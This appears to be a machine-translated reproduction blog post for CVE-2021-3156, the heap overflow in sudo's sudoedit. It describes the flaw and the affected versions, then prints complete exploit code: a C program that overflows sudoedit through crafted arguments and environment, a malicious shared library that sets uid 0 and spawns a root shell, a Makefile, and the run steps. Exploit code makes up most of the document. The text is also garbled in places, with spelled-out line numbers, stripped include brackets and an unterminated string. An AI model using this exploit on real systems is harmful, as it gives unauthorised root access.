CVE-2021-3156 sudo 提权漏洞复现

1 漏洞介绍

1.1 原理

A Unix-class operating system has a heap-based buffer overflow vulnerability when escaping backslashes in command parameters.

When sudo runs a command in shell mode with the -s or -i command line options, it uses a backslash to escape special characters in the command parameters. But when running sudoedit with the -s or -i flags, it is not actually escaped, which may cause buffer overflow. As long as the sudoers file exists (usually /etc/sudoers), an attacker can use local normal users to obtain the system root permissions using sudo.

1.2 影响版本

Sudo 1.8.2 - 1.8.31p2

Sudo 1.9.0 - 1.9.5p1

2 复现

2.1 快速判断漏洞方法

Log in to the system as a non-root user and use the command sudoedit -s /

If an error starting with sudoedit: is responded to, it indicates that there is a vulnerability.

If an error starting with usage: is responded to, it means that the patch has taken effect.

2.2 编译运行

There are three files in total:

hax.c

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

//Tested on:

//Ubunutu 20.0.4.1 LTS

//Sudo version 1.8.31

//Sudoers policy plugin version 1.8.31

//Sudoers file grammar version 46

//Sudoers I/O plugin version 1.8.31

#include stdio.h

#include string.h

#include stdlib.h

#include stdint.h

#include unistd.h

#include ctype.h

#define SUDOEDIT_PATH '/usr/bin/sudoedit'

int main(int argc, char *argv[]) {

//CTF quality exploit below.

char *s_argv[]={

'sudoedit',

'-u', 'root', '-s',

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\',

'\\',

'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\',

NULL

};

char *s_envp[]={

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\',

'X/P0P_SH3LLZ_', '\\',

'LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',

'LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',

'LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,

NULL

};

printf('**** CVE-2021-3156 PoC\n');

execve(SUDOEDIT_PATH, s_argv, s_envp);

return 0;

}

lib.c

1

2

3

4

5

6

7

8

9

10

11

12

13

14

#include unistd.h

#include stdio.h

#include stdlib.h

#include string.h

static void __attribute__ ((constructor)) _init(void);

static void _init(void) {

printf('[+] bl1ng bl1ng! We got it!\n');

setuid(0); setuid(0); setgid(0); setgid(0); setgid(0);

static char *a_argv[]={ 'sh', NULL };

static char *a_envp[]={ 'PATH=/bin:/usr/bin:/sbin', NULL };

execv('/bin/sh', a_argv);

}

Makefile:

1

2

3

4

5

6

7

all:

rm -rf libnss_X

mkdir libnss_X

gcc -o sudo-hax-me-a-sandwich hax.c

gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

clean:

rm -rf libnss_X sudo-hax-me-a-sandwich

Compilation:

1

2

3

tar -zxvf CVE-2021-3156.tar.gz

cd CVE-2021-3156

Make

Execute directly:/sudo-hax-me-a-sandwich.